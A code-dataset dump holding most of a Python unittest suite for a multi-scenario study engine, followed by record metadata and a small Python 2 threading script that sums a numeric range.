'name_list', builder_list=builder_list, autogather=True) mod_list = f'{self.base_path}.disc3_scenario.Disc3' disc3_builder = self.exec_eng.factory.get_builder_from_module( 'Disc3', mod_list) scatter_list.append(disc3_builder) multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder( 'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing') self.exec_eng.factory.set_builders_to_coupling_builder( multi_scenarios) self.exec_eng.configure() self.exec_eng.display_treeview_nodes() dict_values = { f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'}} self.exec_eng.load_study_from_input_dict(dict_values) scenario_df = pd.DataFrame(columns=['scenario_name', 'x']) self.assertTrue(scenario_df.equals( self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))) x1 = 2. x2 = 4. scenario_df = pd.DataFrame( [['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x']) dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_df = pd.DataFrame([['scenario_1', x1], ['scenario_2', x2]], columns=[ 'scenario_name', 'x']) print(scenario_df) print(self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')) self.assertTrue(scenario_df.equals( self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))) dict_values = {self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2']} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() private_val = {} scenario_list = ['scenario_1', 'scenario_2'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 private_val[self.study_name + '.name_1.a'] = a1 private_val[self.study_name + '.name_2.a'] = a2 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 private_val[self.study_name + '.multi_scenarios.scenario_1.Disc3.z'] = 1.2 private_val[self.study_name + '.multi_scenarios.scenario_2.Disc3.z'] = 1.5 self.exec_eng.load_study_from_input_dict(private_val) self.exec_eng.execute() self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.x'), x1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.x'), x2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2) def test_02_multi_scenario_of_scatter_name1_x_trade_variable(self): # scatter build map ac_map = {'input_name': 'name_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'ac_name', 'scatter_ns': 'ns_ac', 'gather_ns': 'ns_scenario', 'ns_to_update': ['ns_data_ac']} self.exec_eng.smaps_manager.add_build_map('name_list', ac_map) # scenario build map scenario_map = {'input_name': 'scenario_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'scenario_name', 'scatter_ns': 'ns_scenario', 'gather_ns': 'ns_scatter_scenario', 'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']} self.exec_eng.smaps_manager.add_build_map( 'scenario_list', scenario_map) # shared namespace self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase') self.exec_eng.ns_manager.add_ns( 'ns_scatter_scenario', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_disc3', 'MyCase.multi_scenarios.Disc3') self.exec_eng.ns_manager.add_ns( 'ns_out_disc3', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_data_ac', 'MyCase') # instantiate factory # get instantiator from Discipline class builder_list = self.factory.get_builder_from_process(repo=self.repo, mod_id='test_disc1_scenario') scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list( 'name_list', builder_list=builder_list, autogather=True) mod_list = f'{self.base_path}.disc3_scenario.Disc3' disc3_builder = self.exec_eng.factory.get_builder_from_module( 'Disc3', mod_list) scatter_list.append(disc3_builder) multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder( 'multi_scenarios', 'scenario_list', scatter_list, autogather=True) self.exec_eng.factory.set_builders_to_coupling_builder( multi_scenarios) self.exec_eng.configure() self.exec_eng.display_treeview_nodes() dict_values = { f'{self.study_name}.multi_scenarios.trade_variables': {'name_1.x': 'float'}} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_df = pd.DataFrame(columns=['scenario_name', 'name_1.x']) self.assertTrue(scenario_df.equals( self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))) x1 = 2. x2 = 4. scenario_df = pd.DataFrame( [['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'name_1.x']) dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() self.assertTrue(scenario_df.equals( self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))) dict_values[self.study_name + '.multi_scenarios.name_list'] = ['name_1', 'name_2'] self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes(display_variables='var_name') private_val = {} scenario_list = ['scenario_1', 'scenario_2'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 x2b = 5.0 private_val[self.study_name + '.name_1.a'] = a1 private_val[self.study_name + '.name_2.a'] = a2 private_val[self.study_name + '.name_2.x'] = x2b private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 private_val[self.study_name + '.multi_scenarios.scenario_1.Disc3.z'] = 1.2 private_val[self.study_name + '.multi_scenarios.scenario_2.Disc3.z'] = 1.5 dict_values.update(private_val) self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.execute() x1 = 2 x2 = 4 self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.x'), x1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.x'), x2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x2b + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2b + b2) def test_03_consecutive_configure(self): # scatter build map ac_map = {'input_name': 'name_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'ac_name', 'scatter_ns': 'ns_ac', 'gather_ns': 'ns_scenario', 'ns_to_update': ['ns_data_ac']} self.exec_eng.smaps_manager.add_build_map('name_list', ac_map) # scenario build map scenario_map = {'input_name': 'scenario_list', 'input_type': 'string_list', 'input_ns': 'ns_scatter_scenario', 'output_name': 'scenario_name', 'scatter_ns': 'ns_scenario', 'gather_ns': 'ns_scatter_scenario', 'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']} self.exec_eng.smaps_manager.add_build_map( 'scenario_list', scenario_map) # shared namespace self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase') self.exec_eng.ns_manager.add_ns( 'ns_scatter_scenario', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_disc3', 'MyCase.multi_scenarios.Disc3') self.exec_eng.ns_manager.add_ns( 'ns_out_disc3', 'MyCase.multi_scenarios') self.exec_eng.ns_manager.add_ns( 'ns_data_ac', 'MyCase') # instantiate factory # get instantiator from Discipline class builder_list = self.factory.get_builder_from_process(repo=self.repo, mod_id='test_disc1_scenario') scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list( 'name_list', builder_list=builder_list, autogather=True) mod_path = f'{self.base_path}.disc3_scenario.Disc3' disc3_builder = self.exec_eng.factory.get_builder_from_module( 'Disc3', mod_path) scatter_list.append(disc3_builder) multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder( 'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing') self.exec_eng.factory.set_builders_to_coupling_builder( multi_scenarios) self.exec_eng.configure() self.exec_eng.display_treeview_nodes() x1 = 2 x2 = 4 scenario_df = pd.DataFrame( [['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x']) dict_values = {f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'}, f'{self.study_name}.multi_scenarios.name_list': ['name_1', 'name_2'], f'{self.study_name}.multi_scenarios.scenario_df': scenario_df} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'): if isinstance(disc, SoSSimpleMultiScenario): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'scenario_1', 'scenario_2']) scenario_df = pd.DataFrame( [['scenario_1', x1]], columns=['scenario_name', 'x']) dict_values = {self.study_name + '.multi_scenarios.scenario_df': scenario_df} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'): if isinstance(disc, SoSSimpleMultiScenario): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'scenario_1']) dict_values = { self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2', 'name_3']} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'): if isinstance(disc, SoSSimpleMultiScenario): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'scenario_1']) for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'): if isinstance(disc, SoSDisciplineScatter): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'name_1', 'name_2', 'name_3']) scenario_df = pd.DataFrame( [['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x']) dict_values = {self.study_name + '.multi_scenarios.scenario_df': scenario_df, self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2']} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'): if isinstance(disc, SoSSimpleMultiScenario): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'scenario_1', 'scenario_2']) for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'): if isinstance(disc, SoSDisciplineScatter): self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [ 'name_1', 'name_2']) private_val = {} scenario_list = ['scenario_1', 'scenario_2'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 private_val[self.study_name + '.name_1.a'] = a1 private_val[self.study_name + '.name_2.a'] = a2 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 private_val[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 private_val[self.study_name + '.multi_scenarios.scenario_1.Disc3.z'] = 1.2 private_val[self.study_name + '.multi_scenarios.scenario_2.Disc3.z'] = 1.5 self.exec_eng.load_study_from_input_dict(private_val) self.exec_eng.execute() for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'): if isinstance(disc, SoSSimpleMultiScenario): self.assertListEqual( [key for key in list(disc.get_data_io_dict('in').keys()) if key not in disc.NUM_DESC_IN], ['trade_variables', 'scenario_list', 'scenario_df', 'scenario_dict']) self.assertDictEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4}) self.assertListEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_list'), ['scenario_1', 'scenario_2']) self.assertDictEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_dict'), {'scenario_1': {'x': 2}, 'scenario_2': {'x': 4}}) self.assertListEqual( list(self.exec_eng.dm.get_disciplines_with_name( f'{self.study_name}')[0].get_sosdisc_outputs().keys()), ['residuals_history']) elif isinstance(disc, SoSScatterData): self.assertListEqual( [key for key in list(disc.get_data_io_dict('in').keys())if key not in disc.NUM_DESC_IN], ['x_dict', 'scenario_list']) self.assertListEqual( list(disc.get_data_io_dict('out').keys()), ['scenario_1.x', 'scenario_2.x']) self.assertDictEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.x_dict'), {'scenario_1': 2, 'scenario_2': 4}) self.assertEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_1.x'), 2) self.assertEqual(self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_2.x'), 4) def test_04_dump_and_load_after_execute(self): builders = self.exec_eng.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') self.exec_eng.factory.set_builders_to_coupling_builder( builders) self.exec_eng.configure() x1 = 2 x2 = 4 scenario_df = pd.DataFrame( [['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x']) dict_values = {} dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'x': 'float'} dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [ 'name_1', 'name_2'] dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df scenario_list = ['scenario_1', 'scenario_2'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 dict_values[self.study_name + '.name_1.a'] = a1 dict_values[self.study_name + '.name_2.a'] = a2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 dict_values[self.study_name + '.multi_scenarios.scenario_1.Disc3.z'] = 1.2 dict_values[self.study_name + '.multi_scenarios.scenario_2.Disc3.z'] = 1.5 self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.execute() self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2) dump_dir = join(self.root_dir, self.namespace) BaseStudyManager.static_dump_data( dump_dir, self.exec_eng, DirectLoadDump()) exec_eng2 = ExecutionEngine(self.namespace) builders = exec_eng2.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') exec_eng2.factory.set_builders_to_coupling_builder(builders) exec_eng2.configure() BaseStudyManager.static_load_data( dump_dir, exec_eng2, DirectLoadDump()) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2) # Clean the dump folder at the end of the test self.dirs_to_del.append( join(self.root_dir, self.namespace)) def test_05_several_trade_variables(self): builders = self.exec_eng.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') self.exec_eng.factory.set_builders_to_coupling_builder( builders) self.exec_eng.configure() x1 = 2 x2 = 4 x3 = 0 x4 = 3 scenario_df = pd.DataFrame( [['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x']) dict_values = {} dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_1.x': 'float', 'name_2.x': 'float'} dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [ 'name_1', 'name_2'] scenario_list = ['scenario_1', 'scenario_2', 'scenario_3'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 dict_values[self.study_name + '.name_1.a'] = a1 dict_values[self.study_name + '.name_2.a'] = a2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2 self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() self.exec_eng.execute() scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3}, 'scenario_2': {'name_1.x': x1, 'name_2.x': x4}, 'scenario_3': {'name_1.x': x2, 'name_2.x': x3}} self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_dict'), scenario_dict) self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_1.x_dict'), { 'scenario_1': x1, 'scenario_2': x1, 'scenario_3': x2}) self.assertDictEqual(self.exec_eng.dm.get_value('MyCase.multi_scenarios.name_2.x_dict'), { 'scenario_1': x3, 'scenario_2': x4, 'scenario_3': x3}) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x3 + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x1 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x4 + b2) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_3.name_1.y'), a1 * x2 + b1) self.assertEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_3.name_2.y'), a2 * x3 + b2) def test_06_trade_on_name_list(self): builders = self.exec_eng.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') self.exec_eng.factory.set_builders_to_coupling_builder( builders) self.exec_eng.configure() scenario_df = pd.DataFrame( [['scenario_A', ['name_1']], ['scenario_B', ['name_1', 'name_2']], ['scenario_C', ['name_1', 'name_2', 'name_3']]], columns=['scenario_name', 'name_list']) dict_values = {} dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_list': 'string_list'} dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df scenario_list = ['scenario_A', 'scenario_B', 'scenario_C'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 a3 = 10 b3 = 0 x = 2 dict_values[self.study_name + '.name_1.a'] = a1 dict_values[self.study_name + '.name_2.a'] = a2 dict_values[self.study_name + '.name_3.a'] = a3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2 dict_values[self.study_name + '.multi_scenarios.scenario_A.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.scenario_B.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.scenario_B.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.scenario_C.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.scenario_C.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.scenario_C.Disc1.name_3.b'] = b3 dict_values[self.study_name + '.name_1.x'] = x dict_values[self.study_name + '.name_2.x'] = x dict_values[self.study_name + '.name_3.x'] = x self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_dict = {'scenario_A': {'name_list': ['name_1']}, 'scenario_B': {'name_list': ['name_1', 'name_2']}, 'scenario_C': {'name_list': ['name_1', 'name_2', 'name_3']}} self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_dict'), scenario_dict) dict_values[f'{self.study_name}.multi_scenarios.name_list_list'] = [ ['name_1', 'name_2'], ['name_1', 'name_2', 'name_3']] dict_values[self.study_name + '.multi_scenarios.scenario_A.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.scenario_B.Disc1.name_3.b'] = b3 self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() self.exec_eng.execute() y1 = a1 * x + b1 y2 = a2 * x + b2 y3 = a3 * x + b3 self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_A.y_dict'), {'name_1': y1}) self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_B.y_dict'), {'name_1': y1, 'name_2': y2}) self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_C.y_dict'), {'name_1': y1, 'name_2': y2, 'name_3': y3}) self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.y_dict'), {'scenario_A.name_1': y1, 'scenario_B.name_1': y1, 'scenario_B.name_2': y2, 'scenario_C.name_1': y1, 'scenario_C.name_2': y2, 'scenario_C.name_3': y3}) def test_07_simple_multi_scenarios_without_trade_variables(self): builders = self.exec_eng.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') self.exec_eng.factory.set_builders_to_coupling_builder( builders) self.exec_eng.configure() scenario_df = pd.DataFrame( [['scenario_A'], ['scenario_B'], ['scenario_C']], columns=['scenario_name']) dict_values = {} dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [ 'name_1', 'name_2'] scenario_list = ['scenario_A', 'scenario_B', 'scenario_C'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 x = 2 dict_values[self.study_name + '.name_1.a'] = a1 dict_values[self.study_name + '.name_2.a'] = a2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2 dict_values[self.study_name + f'.multi_scenarios.{scenario}.Disc1.name_1.b'] = b1 dict_values[self.study_name + f'.multi_scenarios.{scenario}.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.name_1.x'] = x dict_values[self.study_name + '.name_2.x'] = x self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.trade_variables'), {}) self.assertListEqual( self.exec_eng.dm.get_all_namespaces_from_var_name('scenario_dict'), []) def test_08_changing_trade_variables(self): builders = self.exec_eng.factory.get_builder_from_process( repo=self.repo, mod_id='test_disc1_disc3_simple_multi_scenario') self.exec_eng.factory.set_builders_to_coupling_builder( builders) self.exec_eng.configure() dict_values = {} dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_1.x': 'float', 'name_2.x': 'float'} self.exec_eng.load_study_from_input_dict(dict_values) scenario_df = self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_df') self.assertTrue(scenario_df.equals(pd.DataFrame( columns=['scenario_name', 'name_1.x', 'name_2.x']))) dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_list': 'string_list'} self.exec_eng.load_study_from_input_dict(dict_values) scenario_df = self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_df') self.assertTrue(scenario_df.equals(pd.DataFrame( columns=['scenario_name', 'name_list']))) scenario_df = pd.DataFrame([['scenario_1', ['name_1', 'name_2']], [ 'scenario_2', ['name_3']]], columns=['scenario_name', 'name_list']) dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_dict = self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_dict') self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': [ 'name_1', 'name_2']}, 'scenario_2': {'name_list': ['name_3']}}) dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_list': 'string_list', 'name_1.x': 'float', 'name_2.x': 'float'} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_dict = self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_dict') self.assertDictEqual(scenario_dict, {'scenario_1': {'name_list': ['name_1', 'name_2'], 'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': { 'name_list': ['name_3'], 'name_1.x': np.nan, 'name_2.x': np.nan}}) dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [ 'name_1', 'name_2'] dict_values[f'{self.study_name}.multi_scenarios.trade_variables'] = { 'name_1.x': 'float', 'name_2.x': 'float'} self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_dict = self.exec_eng.dm.get_value( f'{self.study_name}.multi_scenarios.scenario_dict') self.assertDictEqual(scenario_dict, {'scenario_1': {'name_1.x': np.nan, 'name_2.x': np.nan}, 'scenario_2': { 'name_1.x': np.nan, 'name_2.x': np.nan}}) x1 = 2 x2 = 4 x3 = 0 x4 = 3 scenario_df = pd.DataFrame( [['scenario_1', x1, x3], ['scenario_2', x1, x4], ['scenario_3', x2, x3]], columns=['scenario_name', 'name_1.x', 'name_2.x']) dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df dict_values[f'{self.study_name}.multi_scenarios.name_list'] = [ 'name_1', 'name_2'] scenario_list = ['scenario_1', 'scenario_2', 'scenario_3'] for scenario in scenario_list: a1 = 3 b1 = 4 a2 = 6 b2 = 2 dict_values[self.study_name + '.name_1.a'] = a1 dict_values[self.study_name + '.name_2.a'] = a2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_1.b'] = b1 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc1.name_2.b'] = b2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.constant'] = 3 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.power'] = 2 dict_values[self.study_name + '.multi_scenarios.' + scenario + '.Disc3.z'] = 1.2 self.exec_eng.load_study_from_input_dict(dict_values) self.exec_eng.display_treeview_nodes() scenario_dict = {'scenario_1': {'name_1.x': x1, 'name_2.x': x3}, 'scenario_2': {'name_1.x': x1, 'name_2.x': x4}, 'scenario_3': {'name_1.x': x2, 'name_2.x': x3}} self.assertDictEqual(self.exec_eng.dm.get_value( 'MyCase.multi_scenarios.scenario_dict'), scenario_dict) if '__main__' == __name__: cls = TestSimpleMultiScenario() cls.setUp() cls.test_06_trade_on_name_list()
44.454446
180
0.602499
386eea48ae59488107d3b8bf92b860dbc71387be
431
py
Python
20160507_4.py
JaeGyu/PythonEx_1
e67053db6ca7431c3dd66351c190c53229e3f141
[ "MIT" ]
null
null
null
20160507_4.py
JaeGyu/PythonEx_1
e67053db6ca7431c3dd66351c190c53229e3f141
[ "MIT" ]
null
null
null
20160507_4.py
JaeGyu/PythonEx_1
e67053db6ca7431c3dd66351c190c53229e3f141
[ "MIT" ]
null
null
null
#_*_ coding: utf-8 _*_ from threading import Thread def do_work(start, end, result): sum = 0 for i in range(start, end): sum += i result.append(sum) return if __name__ == "__main__": START, END = 0, 20000000 result = list() th1 = Thread(target=do_work, args=(START, END/2, result)) th2 = Thread(target=do_work, args=(END/2, END, result)) th1.start() th2.start() th1.join() th2.join() print "Result : ", sum(result)
20.52381
58
0.663573
496878601bdbd8ab8bae6726cea8bbfc4d020ce6
12,021
py
Python
django_extensions/management/commands/graph_models.py
kaozdl/django-extensions
bbc3ae686d2cba9c0bb0a6b88f5e71ddf1a6af36
[ "MIT" ]
null
null
null
django_extensions/management/commands/graph_models.py
kaozdl/django-extensions
